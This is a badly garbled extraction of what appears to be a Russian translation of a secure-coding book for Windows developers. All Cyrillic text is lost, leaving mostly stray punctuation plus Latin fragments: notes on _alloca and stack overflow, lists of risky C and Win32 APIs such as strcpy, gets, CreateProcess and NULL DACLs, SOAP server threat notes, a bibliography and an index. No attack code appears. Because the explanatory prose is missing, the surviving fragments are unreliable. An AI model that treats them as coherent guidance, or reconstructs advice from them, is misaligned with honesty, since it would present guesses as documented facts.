_alloca .
,
23
605
.
_alloca.
void function(char *szData) {

PVOID p = _alloca(lstrlen(szData));
// p
}
szData,
, _alloca , .
, .

_alloca :
void function(char *szData) {

__try {
PVOID p = _alloca(lstrlen(szData));
// p
} __except ((EXCEPTION_STACK_OVERFLOW == GetExceptionCode()) ?
EXCEPTION_EXECUTE_HANDLER :
EXCEPTION_CONTINUE_SEARCH) {
_resetstkoflw();
}
}
ATL

ATL, _alloca. A2W, W2A, CW2CT
. ,
. ,
.
ATL 7.0 Visual Studio .NET 2003
, ,
.
:
#include "atlconv.h"
...
LPWSTR szwString = CA2WEX<64>(szString);
, C# stackalloc, _alloca.
stackalloc ,
/unsafe, unsafe:
public static unsafe void Fibonacci() {

int* fib = stackalloc int[100];
int* p = fib;
*p++ = *p++ = 1;
for (int i=2; i<100; ++i, ++p)
*p = p[!1] + p[!2];
606
IV
for (int i=0; i<10; ++i)

Console.WriteLine (fib[i]);
}

!
, .
,
, .
,
, .
, #ifdef:
#ifdef INTERNAL_USE_ONLY
# ifndef _DEBUG
#
error "
"
# endif // _DEBUG
// ""
#endif // INTERNAL_USE_ONLY
:
,
.
,
, :
DNS NetBIOS ;
(,
);
, EXAIR\account account@explora
tionair.com.
DLL
, , : DLL
? ,
( ,
),
, .
(, ),
, DLL ,
, .
( .rc)
LANGUAGE.
23
607

,
.
, , ,
IIS ISA, ,
.
: ,
, .
.
: DNS NetBIOS ,
IP.
IP, , ,
IP ,
, . ,
: IP
, . ,
(NAT) ? IP ,
192.168.0.1. !
IP ,
,
.

Application Log ( )
. ,
, .
: Microsoft Windows .NET
Server 2003
. ACL
.
Application Log
.

,
. :
,
.
,
.
.
, ,
, ,
, .
, , ,
, , .
608
IV

C/C++
Microsoft
,
C C++, C# . ,
,

. DoS ,
. ,
.
24
,
Microsoft.
:
. , , ,
, ,
.
, , ,
,
!
,
.
, ,
, , , ,
, ,
.
,

.

, ,
,
610
IV
. , ,
, .
,
, , ,
. , , (,
) , ,
.
, ,
, , .
. , ,
,
,
.
,
,
.
, .
, , .

.
, .
,
, , .
, ,
,
.
.
.
, .
, ,
,
,
.
, . ,
, ,
,
.
.
. ,

.
24
611
, , .

. ,
, ,
, .
:
, .

, .
,
API .
,
, ,
API.

,
. ,

( , : ).

,
.
:
, ,
. , ,
.

, .
!
, , ,
, .

( ),
, ,
( ), .

.
,
SOAPServer.
612
IV
SOAPServer
SOAP.
SOAPServer
.
, (,
).
(,
).
,
.
, SOAP, .
.
SOAPServer
, , .
Encrypt Commu
nications .
TLS SOAPServer
.
, IPSec, TLS.

SOAP. SOAPServer
IP ,
.

.
: ,
,
(ACL) SOAP.
ACL,
Windows .NET Server Access Control List.
SOAPServer TCP 80 (
) 443 ( ).
SOAP ,
TCP
, SOAPServer.
SOAPServer ,
,
, .
,
.
,
. .
.
24
613
4: ISOAP_xxx
SOAPServer ISOAP_<_>,
,
. ,
. ,
.
13:

. SSL/TLS,
.
14: SOAP-Server
, SOAPServer

IP DNS. , ,
.
,
.
19:

SOAPServer
Micro
soft Windows .NET Server 2003. , :
, SOAPServer .

,
.
, ,
, , .
, , .

, .
?
, ,
, ().
.
,
,
, .
614
IV

. 241
.
. 241.
, *
, .
, Yes,
No. (. 242),
, . 241.
. 242.
**
? ,
. , Microsoft Internet Explorer

, No.
, ,
, . : ,

. , .

:
, .

,
, .
, .
* :
. . ?
** :
?
24
615
, ,
, ,
, .
. . Windows
, ,
.
, ,
.
, , Windows ,
. 243.
. 243. ,
*
,
, . :
( );
(
);
( ,
).
.

, .
Microsoft Windows,
, , .

, Caps Lock**.
,
, .
,
, .
,
,
, .

, ,
* . .
Caps Lock.
* Windows
. . .
616
IV
. Microsoft Internet Information Services (IIS)

,
,
. .
, (
),
. IIS
.

.
(. 224) .
. 244.
No,
, . ,
, . ,
, .
. ? Yes?
No?
,
.
, . , .
! ,
No ,
Yes .
, Yes,
. , ,

, .
,
.
(informed consent).
,
,
:
24
617
,
;
;
, ;
,
;
, ?
, ;
? ?

.
. ;
,
. ,
,
.
. 245
, .
. 245.
*
* .
, ,
, Acme Incorporated.
Windows ,
Acme Incorporated. ,
, Acme
Incorporated.
Windows
,
. , ,
.
?
Yes, No. . .
618
IV
, ,
, .
.

,

.
, .
, .
, .
,
, (progressive disc
losure). ,
.
,
().
. 246
.
. 246. ,

, .
.
(
, . 241).
, . 241 ,
. ,
(. 247).
24
. 247.
619

, ,
, , .
, . , .
, ,
, . ,
,
. , ,
( ),
, .
: ?.
.
, , ,
.
:
, , ,
:
.
,
, ?
,
. ,

. ,
.
* ,
. ,
.
,
.
,
.
? . .
620
IV
, ,
, ,

. ?
. , ,
.
, Content (
) Internet Options ( ) Internet
Explorer, ,
. Windows Microsoft ,
, .
.

.
Security () Internet
Options Internet Explorer (. 248).
. 248.
,
(,
) , .
,
, .

,
.
.
24
621

, ,
,
. ,

. :
;
;
;

;
, , ;
;
;
;
;
?
, ,

.
, . ,
, . ,
,
.

, ,
, , ,
.
,
:
,
;
,
;
,
;
,
, ;
622
IV
,
;
, ,
.

.

,
,
.
, ,
, ,
.
. Windows XP Windows 2000,
Control Panel ( ) Administrative Tools (
) Local Security Policy (
). ,
( ) .
Local Policies ( ) Security Options (
). , ? ,
Do not Allow Anonymous Enumeration of Accounts and Shares (
) Network
Access ( ). ? ?
?
Help (), Security
Settings ( ),
.

.
, ,
.
, .

. ,
1000 ( ).

.
,
Active Directory,
.

,
.
24
623
,
, ,
.
.

, :
. , ,

,
.
,
.
API-
API .

, , ,
,
. , .
5 ,

.
,
.
(Dave Cutler), Microsoft Windows NT,
, ,
. , .
,
. :
, ,
, !
(
) . ,
, ,
.
, .
,
, .
, ,
. ,
API-
627
, ,
.
! , ,
.
,
.
API-,

C
, .
.
strcpy, wcscpy, lstrcpy, _tcscpy _mbscpy
, null
. ,
.
n ( n) strsafe.
! n strsafe
;

.
strcat, wcscat, lstrcat, _tcscat _mbscat ,
.
strncpy, wcsncpy, _tcsncpy, lstrcpyn _mbsnbcpy ,
.
null .
strncat, wcsncat, _tcsncat _mbsnbcat ,
, , .
,
.
memcpy CopyMemory
, Length.
. _memcpy,
,
.
sprintf swprintf
. ,
628
.
StringCchPrintf.
_snprintf _snwprintf
. ,
( ) .
StringCchPrintf.
printf printf, _sprintf, _snprintf, vprintf, vsprintf
Unicode. ,
. ,
Unicode %s
,
, .
WideCharToMultiByte.
,
%s (, sprintf(szTemp, "%d, %s", dwData, szString),
, strcpy.
_snprintfI StringCchPrintf.
strlen, _tcslen, _mbslen wcslen
, .
,
, .
gets .
, gets .
! fgets.
getc .
scanf("%s",), _tscanf wscanf gets,
scanf, _tscanf, wscanf %s,
. , , ,
%32s, fgets.
(>>) STL
. ,
. , stdin
(cin) szTemp, 16 ,
.
#include "istream"
void main(void) {
char szTemp[16];
cin >> szTemp;
}
, gets.
cin.width.
MultiByteToWideChar ,
Unicode , . ,
. :
API-
629
WCHAR wszName[NAME_LEN];
MultiByteToWideChar(,,,,sizeof(wszName));
sizeof(wszName)/sizeof(wszName[0])
NAME_LEN, ,
.
_mbsinc, _mbsdec, _mbsncat, _mbsncpy, _mbsnextc, _mbsnset, _mbsrev, _mbsset,
_mbsstr, _mbstok, _mbccpy _mbslen
( )
,
.
/ , isleadbyte, _ismbslead _ismbs
trail. _mbbtype.
API-,

CreateDirectory, CreateEvent, CreateFile, CreateFileMapping, CreateHardLink,
CreateJobObject, CreateMailslot, CreateMutex, CreateNamedPipe, CreateSemap
hore, CreateWaitableTimer, MoveFile ,
. API, , ,
(namesquatting).
. , ,
, .
,
c:\temp , ,

. , ,
, ,
, , .
,
, Microsoft Windows 2000 Documents and
Settings.
, .
( ) CREA
TE_NEW ,
, .
, ,
.
. ,
, , !
UNIX
,
Windows. , Windows
, ,
,
(Terminal Services).
630
, ,
, ,
. ,
.
FILE_FLAG_FIRST_PIPE_INSTANCE.
: Windows 2000 SP1
(. 23).
:
,
, .
, , .
.

.
RPC
,
, . , ,
,
.
API-,

. ,
,
,
.
CreateProcess(NULL,), CreateProcessAsUser CreateProcessWithLogon.
, .
null, ,
. , c:\Program Files\MyApp\My
App.exe, c:\Prog
ram.exe. :
.
WinExec ShellExecute , CreateProcess(NULL,),
.
LoadLibrary, LoadLibraryEx SearchPath Windows
.
DLL, (, file.dll c:\dir\dir\file.dll),
, ,
.
.
: DLL ,
, ,
. DLL
API-
631
, DLL GetWindowsDirectory.
, .
Windows XP SP1 Windows .NET Server 2003
, .
.

,
(scroll bar). ,
.
, ( ) (hWnd)
SendMessage.
?
TB_GETBUTTONTEXT, LVM_GETISEARCHSTRING TVM_GETISEAR
CHSTRING ;
, lParam NULL, .
TTM_GETTEXT ;
, 80 .
.
CB_GETLBTEXT, CB_GETLBTEXTLEN, SB_GETTEXT, SB_GETTEXTLENGTH, SB_GET
TIPTEXT, LB_GETTEXT LB_GETTEXTLEN
GETTEXTLENGTH, .
:
,
. .

(ToolTip) SB_GETTIPTEXT.
ES_PASSWORD
(). ,
GetWindowText SetWindowText,
. 9.
API-
,

.
,
, SYSTEM .
.
, .
: RpcImpersonateClient, ImpersonateLoggedOnUser, CoImpersonate
Client, ImpersonateNamedPipeClient, ImpersonateDdeClientWindow, ImpersonateSecurity
Context, ImpersonateAnonymousToken, ImpersonateSelf SetThreadToken.
632
, Microsoft Windows .NET Server 2003

.
. Windows .NET Server 2003,
:
Impersonate (
Identify, );
SeImpersonatePrivilege;
( )
LogonUser, ;
;
COM COM+,
COM, COM
. COM,
Activate as Activator.
SetSecurityDescriptorDacl(,,NULL,)
, (NULL) DACL,
(pDacl) NULL. DACL .
ACE Full Control: Deny
Everyone, ,
.
API-, DoS-
API
, .
InitializeCriticalSection EnterCriticalSection
, ,
. InitializeCriticalSection
AndSpinCount. : EnterCriticalSection Windows XP,
Windows .NET Server . ,

. ,
.
,
LeaveCriticalSection.
. C++
, LeaveCriticalSection
.
_alloca ,
, ,
! ,
, , .
_alloca, , A2OLE, T2W, W2T,
T2COLE, A2W, W2BSTR A2BSTR.
API-
633
_alloca:
,
.
, _resetstkoflw ;

, . .
#include "malloc.h"
...
void main(int argc, char **argv) {
try {
char *p = (char*)_alloca(0xfffff);
} __except(GetExceptionCode() == STATUS_STACK_OVERFLOW) {
int result = _resetstkoflw();
}
}
TerminateThread TerminateProcess
. TerminateThread. ,
, , .
Platform SDK:
TerminateThread ,
. TerminateThread,
,
,
.
TerminateThread
. TerminateProcess
, DLL,
ExitProcess,
. , UNIX: TerminateProcess
, . Win32
.
API-
,
.
, .
, ,
,
TCP.
bind , INADDR_ANY ( )
. 15.
634
recv ,
. 1,
( ) 0,
. recv
. recv
.
WSAEventSelect. ,
.
send , .
, , send
. connect send.
, TCP
, send
. ,
, .
NetApi32
Windows. :
NetUserGetInfo, NetShareEnum . , .
, , ,
45, . :
SMB (Server Message Block)
, Microsoft, .
, Microsoft
, NULL. ,
,
.
API-
API, .
IsBadReadPtr, IsBadWritePtr, IsBadCodePtr, IsBadStringPtr, IsBadHugeReadPtr
IsBadHugeWritePtr IsBadxxxPtr
: .
16 Windows,
.
NULL.
. , .
,
.
, ,
STATUS_ACCESS_VIOLATION.
, , ,
, !
, , ,
. IsBadWritePtr
API-
635
. , , ,
. Windows,

.
! ,
.
, IsBadWritePtr !
CopyFile MoveFile ,
ACL. , CopyFile, ACL
, , ,
MoveFile, ACL. ,
; CLSCTX_REMOTE_SERVER.
,
,
,
.
!
?
!
, .
, ACL.
, .
.
, ,
.
,
.
!
exploit.
!
, !
, .
637
!
! ! ,
, ,
. ,
, , , . ,
!
(scripts)
RPC,
,
(script kiddies), .
.
, :
.
,
Perl,
, ! ,

!
.
, ,
,
, !
?
. :
, , !
, , .
, ,
. ,
.
. ,
, ,
, .
: ,
!
!
: ! , :
! :

. .

, , ,
, .
, exploit,
( ) .
638
,
, .
,
.
, .
,
, .

, .
, , .
:
. , ,
.

.
, . .
, , ,
!
: ,
.
: *.
,

: .
,
. ,
:
;
.
, , ,
.
, ,
.
,
.
, .

, .
, ACL
Windows NT/2000/XP
(ACL). , ACL
* 28 373
. . .
639
. ACL
.

ACL. ,
ACL , Everyone ().
, ( )
, ( ).
ACL Everyone ,
.
,
. Microsoft.
Web , ,
. ,

. ! ,
.
,
Web. .
,
HTTP 80, .
,
Web!
,
Web.
,
, SSL/TLS
HTTP. .
,
.
.

! ,
, , !
Boeing 747400 ?
, ! , , ,
( , ), ,
. ? , .
, ,
, .
.
, ,
,
.
,
. ,
640
,
. .
, ,

. 45
, . 20
, ,
!
:
(open source).
, ,
, .
, ,
. ,
Microsoft: , .
,
, ! !
, ,

, :
. :
, ;
, ;
, ;

;
.
: , ,
,
. , ,
.
IIS 5, IIS 6
;
. , ,
, !
,

.
: ?
: !
: ?
641
: ,
.
: , , , ?
.
,
,
! .

. ,
.
. ,
.
,

. , , !

.
,
. .
, .
!
, ,
, . ...
,
. ,
, ,
.
,
. , .
, ,

, , .
,
, .
, !
exploit-

, ,
. :
30 , exploit,
10 .
, ,
,
. . ,
642

. ,
, ,
,
999 999 . :
,
, . , ,
.

, .
, ,
. , 99 100
,
. , ,
,
, ?
!
, .
, !
! . ,
, .
,
! ,
, : Notepad .
,

. .
,
, .
( Security Templates)
, ,
.
,
.

, BugTraq
NTBugtraq
3, 7
ActiveX,

16
.
,

23
. . .
644
()

23
23
22
23
24

, ,

. : , ,
, .
, ,
. , :
,
.
, ( Security
Templates) ,
, ,
.
GS ( Visual C++ .NET)
RTC1
( Visual C++ .NET)
10
. . .
646
()

Strsafe.h
DACL
, DACL
(NULL)
Everyone ()
14
( PWLEN + 1,
, PWLEN
LMCons.h 256)
23

( ),
23
NTLM
SSPI ( Negotiate)
16
23
CreateProcess
NULL,

23
, ,

17
24
23
11
,
(, COM1, PRN, .)
11
23

HKLM

C:\Program Files
GENERIC_ALL,

IP,
0 INADDR_ANY
15
647
()

( ),
API
23
7, 23
23
Web

Web

13
SQL
12
SQL Server sa
12
ISAPI IIS 5
13
Web

13
eval

13
REFERER
13
23
RPC

IDL /robust
[range]
16
RPC
16
16
16
16
(NULL)

16
16
RPC

16
16
648
ActiveX, COM DCOM

ActiveX,
,
16
SiteLock
16
( ,
DLL, , .)
memset ZeroMemory
. ,
, SecureZeroMemory

CryptoAPI
System.Security.Cryptography
RC4
,
RC4
( 128 ,
40)
FXCop
18
XML

18
, ,
18
, ,

18
18
RequestMinimum

18
RequestRefuse
18
RequestOptional
,
18
, ,

18
649
()

18
Assert RevertAssert

18
, ,

18
Assert
PermitOnly Deny. ,
18
LinkDemand .

18
18
SuppressUnmanagedCodeSecurityAttribute

18
18
( Security Templates)
,
.
,
.

19
SQL,

12, 19
2
SafeDllSearchMode Windows XP
Microsoft Windows .NET Server 2003
11

,

,
,

651
()

,

,

,
ActiveX,
, ,

16
.
,

23
,
:

.
, ,
, ,
. ,
.
,
.
, ,
, .
, ,
, .
,

.
,
. ,
, .
,
.
, .
1. Adams, Carlisle, and Steve Lloyd. Understanding the PublicKey Infrastruc

ture. Indianapolis, IN: Macmillan Technical Publishing, 1999.
, X.509
X.509 (PKIX).
IETF, .
, Jalal Feghhi, . ,
, .
2. Amoroso, Edward G. Fundamentals of Computer Security Technology. Engle
wood Cliffs, NJ: Prentice Hall PTR, 1994. .

.
.
, ,
(BellLaPadula), (Biba)
(ClarkWilson). ,
.
3. Anderson, Ross J. Security Engineering. New York: Wiley, 2001. ,
.

, ,
.
4. Brown, Keith. Programming Windows Security. Reading, MA: AddisonWes
ley, 2000. , API Windows,
.
5. Christiansen, Tom, et al. Perl Cookbook. Sebastopol, CA: OReilly & Associates,
1998.
Perl, .
Perl, ,
.
6. Feghhi, Jalal, and Peter Williams. Digital Certificates: Applied Internet
Security. Reading, MA: AddisonWesley, 1999. ,
,
. ,
, X.509 (PKI).
7. Ford, Warwick. Computer Communications Security: Principles, Standard
Protocols, and Techniques. Englewood Cliffs, NJ: Prentice Hall PTR, 1994.
654
, ,
, , ,
,
.
OSI (Open Systems Interconnection).
8. Friedl, Jeffrey E. F. Mastering Regular Expressions. 2d ed. Sebastopol, CA:
OReilly & Associates, 2002.
.
, Perl .NET Framework.
, ,
.
9. Garfinkel, Simson, and Gene Spafford. Practical UNIX & Internet Security.
2d ed. Sebastopol, CA: OReilly & Associates, 1996.
, ! ,
UNIX,

.
UNIX,
(Department of Defense),
Rainbow Series.
10. Garfinkel, Simson, and Gene Spafford. Web Security & Commerce. Sebas
topol, CA: OReilly and Associates, 1997.
Web
.
11. Gollmann, Dieter. Computer Security. New York: Wiley, 1999.
, Funda
mentals of Computer Security Technology. ,
, Microsoft Windows NT, UNIX
Web.
12. Grimes, Richard. Professional DCOM Programming. Birmingham, U.K.: Wrox
Press, 1997.
DCOM, , ,
.
13. Howard, Michael, et al. Designing Secure WebBased Applications for Micro
soft Windows 2000. Redmond, WA: Microsoft Press, 2000.
Web,
. , ,
Windows 2000 .
14. LaMacchia, Brian et al. .NET Framework Security. Reading, MA: Addison
Wesley, 2000. ,
. ,
.NET.
15. Lippert, Eric. Visual Basic .NET Code Security Handbook. Birmingham, UK:
Wrox Press, 2002. .NET.
, ,
.
655
16. Maguire, Steve. Writing Solid Code. Redmond, WA: Microsoft Press, 1993.
.
,
. ,
,
, ,
.
, , ,
,
.
17. McClure, Stuart, and Joel Scambray. Hacking Exposed: Windows 2000. Ber
keley, CA: Osborne/McGrawHill, 2001. Win
dows 2000 ,
. Win
dows 2000 ,
Windows, .
, Windows 2000,
, .
18. McClure, Stuart, Joel Scambray, and George Kurtz. Hacking Exposed: Net
work Security Secrets and Solutions. 2nd ed. Berkeley, CA: Osborne/McGraw
Hill, 2000. , ,
, !
Netware, UNIX, Windows 95/98 Windows NT.
,
.
.
19. Menezes, Alfred J. et al. Handbook for Applied Cryptography. Boca Raton,
FL: CRC Press, 1997. ,

.
.
20. National Research Council. Trust in Cyberspace. Edited by Fred B. Schneider.
Washington, D.C.: National Academy Press, 1999.
,
,
, .
21. Online Law. Edited by Thomas J. Smedinghoff. Reading, MA: AddisonWesley
Developers Press, 1996.
, ,
, , ,
, . ,

.
22. Ryan, Peter, and Steve Schneider. Modelling and Analysis of Security Proto
cols. London, England: Pearson Education Ltd, 2001.
, .
656
,

. ,
.
23. Schneier, Bruce. Applied Cryptography: Protocols, Algorithms, and Source
Code in C. 2d ed. New York: Wiley, 1996. ,
. , :)?
24. Security Protocols. Edited by Bruce Christianson, et al. Berlin: Springer, 1998.
,
. :
,
.
25. Shimomura, Tsutomu, and John Markoff. Takedown: The Pursuit and Cap
ture of Kevin Mitnick, Americas Most Wanted Computer OutlawBy the
Man Who Did It. New York: Hyperion, 1996.
,
Well, Sun Microsystems . ,
The Cuckoos Egg, , , .
26. Solomon, David A., and Mark Russinovich. Inside Microsoft Windows 2000.
Redmond, WA: Microsoft Press, 2000.
Inside Windows NT.
, ,
,
. Windows NT 1993 .
SDK ()
.
( ,
, ,
), , ,
.*
27. Stallings, William. Practical Cryptography for Data Internetworks. Los
Alamitos, CA: IEEE Computer Society Press, 1996.
. ,
.

, , DES, IDEA,
SkipJack, RC5, , ,
, SNMP, .
28. Stallings, William. Cryptography and Network Security: Principles and
Practice. Englewood Cliffs, NJ: Prentice Hall, 1999.
,
, , S/MIME, SET, SSL/TLS, IPSec,
* : . ., Microsoft
Windows 2000. . .: ; .:
, 2001.
657
PGP Kerberos. ,
Applied Cryptography: Protocols, Algorithms, and Source Code in C,

.
29. Stevens, W. Richard. TCP/IP Illustrated, Volume 1: The Protocols. Reading,
MA: Addison Wesley, 1994. ,
IP. ,
. ,
.
30. Stoll, Clifford. The Cuckoos Egg. London: Pan Macmillan, 1991.
, , ,
,
, .
.
31. Summers, Rita C. Secure Computing: Threats and Safeguards. New York:
McGrawHill, 1997. , ,

. ,
.
32. The Unicode Consortium. The Unicode Standard, Version 3.0. Reading, MA:
AddisonWesley, 2000. ( www.uni
code.org.) , ,
, ! ,
, Unicode
.
33. Viega, John and McGraw Gary. Building Secure Software. Reading, MA: Addi
sonWesley, 2001. UNIX ,
. ,
UNIX, .
Windows.
!
34. Whittaker, James A. How to Break Software: A Practical Guide to Testing.
Reading, MA: AddisonWesley, 2002.
. ,
, .
,
.
35. Zwicky, Elizabeth, et al. Building Internet Firewalls. 2d ed. Sebastopol, CA:
OReilly & Associates, 2000. ,
,
. , ,
. Windows
, .

3
3DES 243, 247
3DES (TripleDES)
290
A
access control entry . ACE
Access Control List . ACL
ACE (access control entry) 98,147,
151, 153, 154, 155, 159, 160, 164,
166, 169, 180
ACK 398
ACL (Access Control List) 49, 97, 98,
147, 149, 150, 152, 153, 154, 155,
166, 170, 187, 188, 190, 262, 296,
317
ACE 164
ACE 164
155
Active Server Pages . ASP
Active Template Library . ATL
ActiveX 440, 441, 442, 443
activity diagram . ,
Advanced Encryption Standard

. AES
AES (Advanced Encryption
Standard) 243
Affected users . ,
,
ANSI 130, 132, 374

API 100, 189, 192, 390
. DPAPI
AppID (application ID) 437
ASP (Active Server Pages) 324
ATL (Active Template Library) 155,
162
B
Back Orifice 179
Basic authentication
. ,
bind .
bit flip . ,
blanket . ,
.
bug .
C
C Runtime . CRT
canonicalization .

CAPICOM 242, 254
Cartesian join .
CAS (Code Access Security) 464, 466

checkin . ,
chokepoint .
Cipher 234
loaking .
CLR (Common Language Runtime)
171, 254, 282, 463, 472
Code Access Security . CAS
code diffs . ,
code point .
COM (Component Object
Model) 411, 440
COM Internet Services
. COM
COM+ 172
combining character .
command shell .
Common Language Runtime . CLR

Component Object Model . COM
COM 432
connectable object .
connection point .
control flow graph .

cookie 357, 359, 365, 374,
375
credential .
crosssite scripting (XSS) . ,

659
CRT (C Runtime) 223

Crucial ADS 317
CryptoAPI (Cryptographic API) 100,
237, 241, 243, 244, 247, 254, 262
CSP (Cryptographic Service Provider)
228
D
DACL (Discretionary Access Control
List) 147, 151, 158, 160, 169, 180,
398
167, 169
Damage potential . ,

Data Encryption Standard . DES,
. DES
data flow diagrams . DFD
data fork . ,
Data Protection API . DPAPI
DCE (Distributed Computing
Environment) 411
DCOM (Distributed COM) 99, 103,
257, 411, 432, 434, 435, 436
DDoS (distributed denial of service)
. , ,
dead code . ,
dead store elimination .

declarative permission
. ,
defacement . ,
Web
Denial of Service (DoS) . ,

DES (Data Encryption Standard) 23,
231, 243, 244, 247
DFD (data flow diagrams) 64, 75,
82, 83
DHTML (Dynamic HTML) 357
dictionary attack . ,

Digest authentication .
,
digest function . ,
Discoverability . ,

Discretionary Access Control List
. DACL
Distributed COM . DCOM

Distributed Computing
Environment . DCE
DLL 372
DNS 55, 86, 98, 173, 338
DNS cache poisoning .
,
DNS
DNS spoofing . ,
DNS
DoS (Denial of Service) . ,

dotless IP address . IP,

dottedIP address . IP,

DPAPI (Data Protection API) 191,
262, 263, 268, 283
Dynamic HTML . DHTML
E
EFS (Encrypting File System) 99
Elevation of privilege . ,

Encrypting File System . EFS
ephemeral . ,
exception handler clobbering
. ,

Exploitability . ,

F
factoring . ,

FAT 290
fault tree .
FileMon 217
filtering .
fork .
FTP 154
FxCop 466
G
GAC (global assembly cache)
GNU C 279
469
660
H
hard link . ,
hash function . ,
HashBased Message Authentication
Code . HMAC
heap overflow . ,

HFS 323
HFS+ (Hierarchical File System
Plus) 314
HMAC (HashBased Message
Authentication Code) 250
honeypot .
HTML 58, 359, 363, 364
HTTP (Hypertext transfer
protocol) 5, 77, 154, 355, 371
HTTPS 96
Hypertext transfer protocol
. HTTP
I
I18N 378, 380
IAS (Internet Authentication
Service) 97
ICMP (Internet Control Message
Protocol) 462
ID 125

125, 391, 448
125
IDEA 243
IETF (Internet Engineering Task
Force) 99
IIS (Internet Information Services) 5,
95, 98, 132, 154, 173, 179, 317,
321, 324, 364, 485
IMAP (Internet Message Access
Protocol) 94
imperative permission
. ,
impersonation .
index out of range . ,

Information disclosure
. ,
Internet Authentication Service

. IAS
Internet Control Message
Protocol . ICMP
Internet Engineering Task Force

. IETF
Internet Information Services . IIS
Internet Message Access Protocol
. IMAP
Internet Printing Protocol . IPP
Internet Protocol Security . IPSec
Internet Protocol version 4 . IPv4
Internet Protocol version 6 . IPv6
Internet Server Application
Programming Interface . ISAPI
IP restriction . IP
IPP (Internet Printing Protocol) 132,
179, 180
IPSec (Internet Protocol
Security) 54, 93, 94, 99, 102, 240,
257, 409
IPv4 (Internet Protocol version
4) 391
IPv6 (Internet Protocol version
6) 390, 409, 460
IP 338
322
322
IP 97, 98, 170, 173
ISAPI (Internet Server Application
Programming Interface) 48, 132,
179, 337, 372, 374
J
JavaScript 58
JIT 477
JScript 242, 329
K
Kerberos 23, 92, 95, 419, 420
keyed hash .
L
LAN Manager 54
LDAP 94, 97
linear congruential function
. ,
Local Security Authority . LSA

logging .
LSA (Local Security Authority) 184,
187, 189, 264, 268, 283, 459
luring atack . ,
M
MAC (message authentication code)
92, 99, 100, 249, 253, 374
mailslot .
malware .
maninthemiddle . ,
marsalling .
maximum segment lifetime . MSL
message authentication code
. MAC
MFC (Microsoft Foundation
Classes) 140
Microsoft Interface Definition
Language . MIDL
Microsoft JScript 152
Microsoft Transaction Server 435
Microsoft Visual Basic Scripting
Edition . VBScript
MIDL (Microsoft Interface Definition
Language) 416
MSDOS 314
MSL (maximum segment
lifetime) 399
mutex .
N
named pipe . ,
Napster 313
National Language Support . NLS
Negotiate 95
NetBIOS 97, 322, 460
NLS (National Language
Support) 378
NT LAN Manager . NTLM
NTFS 317
NTLM (NT LAN Manager) 93, 95, 96,
419, 420
NULL DACL . DACL,
O
OBJREF (object reference)
.
offbyone error . ,

ONC (Open Network
Computing) 411
661
Open Software Foundation RPC

. OSF RPC
OpenSSH 53
OSF RPC (Open Software Foundation
RPC) 412
owner .
P
parameterized command
.
PasswordBased Key Derivation
Function #1 . PBKDF1
patch .
PBKDF1 (PasswordBased Key
Derivation Function #1) 261
PGP (Pretty Good Privacy) 103
Ping of Death . , ping
PKCS #5 (PublicKey Cryptography

Standard) 261
placeholder .
plugin .
pointer subterfuge . ,

poisoning .
POP3 (Post Office Protocol 3) 94
port scanning .
Portable Operating System Interface

for UNIX . POSIX
POSIX (Portable Operating System
Interface for UNIX) 319
Post Office Protocol 3 . POP3
Pretty Good Privacy . PGP
principal .
promiscuous mode . ,
protocol sequences
.
PublicKey Cryptography
Standard . PKCS #5
Q
QoS (quality of service)
.
662
R
RADIUS (Remote Administration Dial
In User Service) 93, 97
RC4 243
register attack . ,
Regmon 217
regression bug .
Remote Administration DialIn User

Service . RADIUS
Remote Desktop .

Remote Procedure Call . RPC
Reproducibility . ,
Repudiation . ,

resource fork . ,
restricted token . ,
restricting SID . SID,
reverse engineering .
RivestShamirAdleman . RSA
RPC(Remote Procedure Call) 48, 99,
103, 257, 411, 412, 413, 415, 416,
421, 424, 428, 429
48

461
412
RPC endpoint mapping service
. RPC,

RPC runtime . RPC,
RSA (RivestShamirAdleman) 22, 23,

235, 243
S
S/MIME (Secure/Multipurpose
Internet Mail Extensions) 103
SACL (System Access Control List)
151, 158, 160, 267
safe for initialization (SFI) . ,
,
safe for scripting (SFS) . ,

,
salt .
SAM (Security Account Manager)
318, 339
Schannel 95
SCM (Service Control Manager) 187
script .
SDDL (Security Descriptor Definition
Language) 159162
Secure Sockets Layer . SSL
Secure/Multipurpose Internet Mail
Extensions . S/MIME
SecureIIS 321
Security Account Manager . SAM
Security Configuration Editor
.
security descriptor .
Security Descriptor Definition

Language . SDDL
Security Expressions 317
security ID . SID
Security Support Provider . SSP
Security Support Provider
Interface . SSPI
seed value .

serializing .
server hijacking . ,
Server Message Block . SMB

Service Control Manager . SCM
service principal name . SPN,
. SPN
SFI (safe for initialization) . ,
,
SFS (safe for scripting) . ,

,
SID (security ID) 151, 158, 159, 161,

162, 163, 166, 180, 186, 187, 188,
193, 197, 214
denyonly . ,

205
201
signed integer . ID,
Simple Mail Transfer Protocol

. SMTP
single point of failure .

SMB (Server Message Block) 54, 460
SMS (Systems Management
Server) 436
SMTP (Simple Mail Transfer
Protocol) 94, 474
sniffer .
social engineering . ,

socket .
SPN (service principal name) 96,
418
Spoofing identity . ,

SQL injection . SQL
SSL (Secure Socket Layer) 57, 94, 95,

96, 99, 102, 225, 257, 355, 375, 390
SSP (Security Support Provider) 95
SSPI (Security Support Provider
Interface) 95, 265, 390
stack smashing . ,

stack walk .
stackbased cookie .
cookie
StackGuard 118, 144
STL (Standard Template
Library) 139, 310
stream cipher . ,
Streams 317
strict handle .
,
Strings 234
strong named assembly .

SubSeven 179
superuser .
surrogate pair .
symbolic link (symlink) . ,
SYN flood .
SYN
System Access Control List . SACL
663
system entropy .
Systems Management Server . SMS
T
Tampering with data . ,

TCB (Trusted Computing Base) 185
TCP (Transmission Control
Protocol) 10, 390, 391, 404
TCP/IP 54, 99, 390
Terminal Server .
threat model . ,
threat target .
threat tree . ,
throttling .

TLS (Transport Layer Security) 57,
94, 95, 96, 99, 102, 257, 355, 375,
390
token .
TransactSQL 349
Transmission Control Protocol
. TCP
Transport Layer Security . TLS
truncation error . ,

Trusted Computing Base . TCB
trustworthy computing .

U
UDP 390, 391, 408, 462
UDP bomb . , UDP
UID (User ID) 125
UML (Unified Modeling
Language) 64, 153
UNC (Universal Naming
Convention) 319
Unicode 130, 132, 304, 327, 374,
377, 378, 380, 386, 387
Unified Modeling Language . UML
Universal Naming Convention
. UNC
unsigned short . ID,

UPN (user principal name) 339
664
usability . ,
USB 472
User ID . UID
user principal name . UPN
UTF8 325, 326, 378
UTF16 378
UTF32 378
V
VBScript (Microsoft Visual Basic
Scripting Edition) 152, 231, 309,
329
VTable hijacking . ,
VTable
W
waterfall approach .
,
Web 355
Webbased Distributed Authoring and
Versioning . WebDAV
WebDAV (Webbased Distributed
